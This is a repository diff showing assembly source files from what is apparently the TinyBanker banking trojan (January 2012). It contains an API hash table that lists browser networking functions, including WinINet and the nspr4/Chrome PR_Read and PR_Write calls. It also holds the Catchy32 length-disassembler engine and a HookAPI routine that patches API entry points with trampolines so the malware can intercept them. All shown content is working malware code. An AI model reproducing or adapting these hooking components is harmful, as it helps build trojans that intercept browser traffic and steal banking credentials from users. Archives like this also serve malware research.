_InternetReadFile dd 0, 0F268CC2Bh
_InternetQueryDataAvailable dd 0, 09450A760h
_HttpSendRequestExW dd 0, 08BDF869Dh
_InternetWriteFile dd 0, 0A34C2E52h
_HttpEndRequestA dd 0, 087F01B75h
_InternetCloseHandle dd 0, 0E46D3CDFh
;; nspr4 & chrome
_PR_Write dd 0, 0049CBEFAh
_PR_Read dd 0, 000A8A40Bh
_PR_Close dd 0, 0049BFC7Bh
;; API Hashes table end
dd 0, 0

286
malwares/Source/Original/TinyBanker_Jan2012/source/API/Catchy32.inc Normal file
View File

@@ -0,0 +1,286 @@
;==================================================================================================================================================
; ******** *** *********** ********* *** *** *** *** ******* *******
; *********** **** **** *********** *********** *** *** *** *** ***** ***** ***** *****
; *** *** *** *** *** *** *** *** *** *** *** ** *** ** ****
; *** *********** *** *** *********** ** ** **** ****
; *** *** *********** *** *** *** *********** *** ** *** ****
; *********** *** *** *** *********** *** *** *** ***** ***** ***********
; ********* *** *** *** ********* *** *** *** ******* ***********
;==================================================Catchy32 v1.6 - Length Disassembler Engine 32bit================================================
;SIZE=580 bytes
;Version:
;1.0-test version
;1.1-added: support prefix
;1.2-added: TableEXT
;1.3-added: support for 0F6h and 0F7h groups
;1.4-tables fixed
; -SIB byte handling fixed
;1.5-code fixed&optimized
; -processing 0F6h and 0F7h groups is corrected
; -processing 0A0h-0A3h groups is corrected
;1.6-code fixed
; -added: max lenght=15 bytes
;==================================================================================================================================================
;in: esi - pointer to opcode
;out: eax - opcode length or 0ffffffffh if error
;(c) sars [HI-TECH] 2003
;sars@ukrtop.com
;==================================================================================================================================================
pref66h equ 1
pref67h equ 2
.code
;---------------Initial adjustment----------------
c_Catchy:
pushad
call c_Delta
;------------Delta-offset calculation-------------
c_Delta:
pop ebp
sub ebp, offset c_Delta
xor ecx, ecx
;----Flags extraction, checks for some opcodes----
c_ExtFlags:
xor eax, eax
xor ebx, ebx
cdq
lodsb ;al <- opcode
mov cl, al ;cl <- opcode
cmp al, 0fh ;Test on prefix 0Fh
je c_ExtdTable
cmp word ptr [esi-1], 20CDh ;Test on VXD call
jne c_NormTable
inc esi ;If VXD call (int 20h), then command length is 6 bytes
lodsd
jmp c_CalcLen
c_ExtdTable: ;Load flags from extended table
lodsb
inc ah ;EAX=al+100h (100h/2 - lenght first table)
c_NormTable: ;Load flags from normal table
shr eax, 1 ;Elements tables on 4 bits
mov al, byte ptr [ebp+c_Table+eax]
c_CheckC1:
jc c_IFC1
shr eax, 4 ;Get high 4-bits block if offset is odd, otherwise...
c_IFC1:
and eax, 0Fh ;...low
xchg eax, ebx ;EAX will be needed for other purposes
;--------------Opcode type checking---------------
c_CheckFlags:
cmp bl, 0Eh ;Test on ErrorFlag
je c_Error
cmp bl, 0Fh ;Test on PrefixFlag
je c_Prefix
or ebx, ebx ;One byte command
jz c_CalcLen
btr ebx, 0 ;Command with ModRM byte
jc c_ModRM
btr ebx, 1 ;Test on imm8,rel8 etc flag
jc c_incr1
btr ebx, 2 ;Test on ptr16 etc flag
jc c_incr2
;-----imm16/32,rel16/32, etc types processing-----
c_16_32:
and bl, 11110111b ;Reset 16/32 sign
cmp cl, 0A0h ;Processing group 0A0h-0A3h
jb c_Check66h
cmp cl, 0A3h
ja c_Check66h
test ch, pref67h
jnz c_incr2
jmp c_incr4
c_Check66h: ;Processing other groups
test ch, pref66h
jz c_incr4
jmp c_incr2
;---------------Prefixes processing---------------
c_Prefix:
cmp cl, 66h
je c_SetFlag66h
cmp cl, 67h
jne c_ExtFlags
c_SetFlag67h:
or ch, pref67h
jmp c_ExtFlags
c_SetFlag66h:
or ch, pref66h
jmp c_ExtFlags
;--------------ModR/M byte processing-------------
c_ModRM:
lodsb
c_Check_0F6h_0F7h: ;Check on 0F6h and 0F7h groups
cmp cl, 0F7h
je c_GroupF6F7
cmp cl, 0F6h
jne c_ModXX
c_GroupF6F7: ;Processing groups 0F6h and 0F7h
test al, 00111000b
jnz c_ModXX
test cl, 00000001b
jz c_incbt1
test ch, 1
jnz c_incbt2
inc esi
inc esi
c_incbt2: inc esi
c_incbt1: inc esi
c_ModXX: ;Processing MOD bits
mov edx, eax
and al, 00000111b ;al <- only R/M bits
test dl, 11000000b ;Check MOD bits
jz c_Mod00
jp c_CheckFlags ;Or c_Mod11
js c_Mod10
c_Mod01:
test ch, pref67h
jnz c_incr1 ;16-bit addressing
cmp al, 4 ;Check SIB
je c_incr2
jmp c_incr1
c_Mod00:
test ch, pref67h
jz c_Mod00_32 ;32-bit addressing
cmp al, 6
je c_incr2
jmp c_CheckFlags
c_Mod00_32:
cmp al, 4 ;Check SIB
jne c_disp32
c_SIB: ;Processing SIB byte
lodsb
and al, 00000111b
cmp al, 5
je c_incr4
jmp c_CheckFlags
c_disp32:
cmp al, 5
je c_incr4
jmp c_CheckFlags
c_Mod10:
test ch, pref67h
jnz c_incr2 ;16-bit addressing
cmp al, 4 ;Check SIB
je c_incr5
jmp c_incr4
c_incr5: inc esi
c_incr4: inc esi
inc esi
c_incr2: inc esi
c_incr1: inc esi
jmp c_CheckFlags
;-----------Command length calculation------------
c_CalcLen:
sub esi, [esp+4*1]
cmp esi, 15
ja c_Error
mov [esp+4*7], esi
jmp c_Exit
;----------------Setting the error----------------
c_Error:
xor eax, eax
dec eax
mov [esp+4*7], eax
;---------Restore the registers and exit----------
c_Exit:
popad
ret
;-------------------------------------------------
;==================================================================================================================================================
;Flag tables for normal and extended Intel opcodes
;(c) sars [HI-TECH] 2003
;sars@ukrtop.com
;
;Version:
;01-test version
;02-added: TableEXT
;03-added: new flags
;04-added: support for MMX, SSE, SSE2, 3DNOW
;
;Description:
;Size of table element is 4 bits.
;0h-one byte instruction
;1h-ModRM byte
;2h-imm8,rel8 etc
;4h-ptr16 etc
;8h-imm16/32,rel16/32 etc
;0Fh-prefix
;0Eh-unsupported opcodes
;3DNOW-Supported
;SSE-Supported
;SSE2-Supported
;MMX-Supported
;================NORMAL OPCODES================
c_Table:
; 01 23 45 67 89 AB CD EF
db 011h,011h,028h,000h,011h,011h,028h,000h;0Fh
db 011h,011h,028h,000h,011h,011h,028h,000h;1Fh
db 011h,011h,028h,0F0h,011h,011h,028h,0F0h;2Fh
db 011h,011h,028h,0F0h,011h,011h,028h,0F0h;3Fh
db 000h,000h,000h,000h,000h,000h,000h,000h;4Fh
db 000h,000h,000h,000h,000h,000h,000h,000h;5Fh
db 000h,011h,0FFh,0FFh,089h,023h,000h,000h;6Fh
db 022h,022h,022h,022h,022h,022h,022h,022h;7Fh
db 039h,033h,011h,011h,011h,011h,011h,011h;8Fh
db 000h,000h,000h,000h,000h,0C0h,000h,000h;9Fh
db 088h,088h,000h,000h,028h,000h,000h,000h;AFh
db 022h,022h,022h,022h,088h,088h,088h,088h;BFh
db 033h,040h,011h,039h,060h,040h,002h,000h;CFh
db 011h,011h,022h,000h,011h,011h,011h,011h;DFh
db 022h,022h,022h,022h,088h,0C2h,000h,000h;EFh
db 0F0h,0FFh,000h,011h,000h,000h,000h,011h;FFh
;==============================================
Lentable equ $-c_Table
comment !
;===============EXTENDED OPCODES===============
c_TableEXT:
; 01 23 45 67 89 AB CD EF
db 011h,011h,0E0h,000h,000h,0EEh,0E1h,003h;0Fh
db 011h,011h,011h,011h,01Eh,0EEh,0EEh,0EEh;1Fh
db 011h,011h,01Eh,01Eh,011h,011h,011h,011h;2Fh
db 000h,000h,000h,0EEh,0EEh,0EEh,0EEh,0EEh;3Fh
db 011h,011h,011h,011h,011h,011h,011h,011h;4Fh
db 011h,011h,011h,011h,011h,011h,011h,011h;5Fh
db 011h,011h,011h,011h,011h,011h,011h,011h;6Fh
db 033h,033h,011h,010h,011h,011h,011h,011h;7Fh
db 088h,088h,088h,088h,088h,088h,088h,088h;8Fh
db 011h,011h,011h,011h,011h,011h,011h,011h;9Fh
db 000h,001h,031h,011h,000h,001h,031h,011h;AFh
db 011h,011h,011h,011h,0EEh,031h,011h,011h;BFh
db 011h,031h,033h,031h,000h,000h,000h,000h;CFh
db 0E1h,011h,011h,011h,011h,011h,011h,011h;DFh
db 011h,011h,011h,011h,011h,011h,011h,011h;EFh
db 0E1h,011h,011h,011h,011h,011h,011h,01Eh;FFh
;==============================================
!
;==================================================================================================================================================

94
malwares/Source/Original/TinyBanker_Jan2012/source/API/HookAPI.inc Normal file
View File

@@ -0,0 +1,94 @@
.code
;; ==================================================================================================== ;;
;; HookAPI - procedure sets hook on given API address ;;
;; replace original API start to push addr and retn to handler procedure ;;
;; creates trampoline contained replaced code of original API and return to code after it ;;
;; changes given API pointer to address of trampoline (real API code start) ;;
;; __in lpHandlerProc - pointer to handler procedure ;;
;; __inout plpAPI - pointer to API pointer ;;
;; ==================================================================================================== ;;
HookAPI proc uses ecx edi esi lpHandlerProc, plpAPI : dword
local lpAPI : dword
local flOldProtect : dword
mov eax, plpAPI
mov eax, [eax]
mov lpAPI, eax
;; Change API memory protection
invokx _VirtualProtect[ebx], lpAPI, 32, PAGE_READWRITE, &flOldProtect
test eax, eax
jz @ret
;; Allocate memory for trampoline
invokx _VirtualAlloc[ebx], 0, 32, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE
test eax, eax
jz @oldprotect
mov edi, eax
;; Get size of code to copy
xor ecx, ecx
mov esi, lpAPI
@@: mov eax, ebx
add eax, c_Catchy
call eax
cmp eax, -1
je @error
add esi, eax ;; esi = current code instruction
add ecx, eax ;; eax = current instructions len
cmp ecx, 5
jb @B
;; Copy original api code to new place
mov eax, edi ;; save
sub esi, ecx ;; pointer to current API start
rep movsb
;; Write return to original API code + len of copied code
mov byte ptr [edi], 68h ;; PUSH offset original API + offsed of copied code
mov dword ptr [edi+1], esi ;; addr
mov byte ptr [edi+5], 0C3h ;; RETN
;; New real API address
mov edi, plpAPI
mov [edi], eax
;; Edit original API code start
mov edi, lpAPI
mov eax, lpHandlerProc
mov byte ptr [edi], 0E9h ;; JMP FAR
sub eax, edi ;;
sub eax, 5 ;;
mov dword ptr [edi+1], eax ;; addr
jmp @oldprotect
@error:
;; Release trampoline memory
invokx _VirtualFree[ebx], edi, 0, MEM_RELEASE
@oldprotect:
;; Restore old API memory protection
invokx _VirtualProtect[ebx], lpAPI, 32, flOldProtect, &flOldProtect
@ret:
ret
HookAPI endp

Some files were not shown because too many files have changed in this diff Show More